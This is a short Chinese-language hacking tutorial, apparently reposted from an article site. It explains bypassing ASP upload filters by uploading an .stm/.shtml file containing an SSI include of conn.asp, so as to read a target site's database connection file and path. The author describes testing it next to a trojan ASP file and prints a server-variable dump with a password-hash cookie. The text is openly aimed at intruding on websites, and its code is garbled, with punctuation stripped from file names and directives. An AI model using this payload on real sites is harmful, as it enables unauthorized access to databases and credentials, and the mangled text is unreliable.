利用stm來上傳還能執行程序代碼
說保存為stm或者shtml看看運行如下:
HTTP_ACCEPT:image/gif image/xxbitmap image/jpeg
image/pjpeg application/xshockwaveflash
application/vndmspowerpoint
application/vndmsexcel application/msword
*/* HTTP_ACCEPT_LANGUAGE:zhcn HTTP_CONNECTION:KeepAlive
HTTP_HOST:localhost HTTP_USER_AGENT:Mozilla/
(compatible; MSIE ; Windows NT ; Maxthon; NET CLR )
HTTP_COOKIE:nbblastactivity=; bblastvisit=;
bblastactivity=; bbuserid=;
bbpassword=fdedeaafbaafcf;
ASPSESSIONIDAQTSDRQQ=JOGDCEBDCNKFMLGDNFHPDHMJ
HTTP_ACCEPT_ENCODING:gzip deflate
當前文件名稱:F:Webstm
Web服務器的名稱和版本:MicrosoftIIS/
主機名:localhost
端口:
客戶或客戶代理IP地址:
客戶或客戶代理主機名:
PATH_INFO 的值但帶有擴展為某個目錄規范的虛擬路 徑:F:Webstm
客戶端給出附加路徑信息:/stm
image/gif image/xxbitmap image/jpeg image/pjpeg application/xshockwaveflash application/vndmspowerpoint application/vndmsexcel application/msword */*
Quoted from Unkown:
當網站不允許上傳asp cer cdx htr等文件時 上傳一個stm文件 內容為:
<!#include file=connasp>
直接請求這個stm文件 connasp就一覽無遺 數據庫路徑也就到手啦
原來就是如上所說的
<!#include file=connasp>
就是一條SSI指令其作用是將的內容拷貝到當前的頁面中當訪問者來浏覽時會看到其它HTML文檔一樣顯示其中的內容
我在本地試驗成功!在我的iis目錄下建了一個teststm文件內容為
<!#include file=connasp>
又在同一目錄下放了一個我的一個木馬文件okasp在浏覽器中請求teststm沒有什麼反映一片空白但是一查看源代碼狂暈原來就是我的asp文件的內容!這樣我們就可以利用這個來獲取要入侵的web的conn文件來獲得數據庫路徑但是一個前提是服務器的對stm或者shtml的擴展沒有刪除!
From:http://tw.wingwit.com/Article/Network/201311/29898.html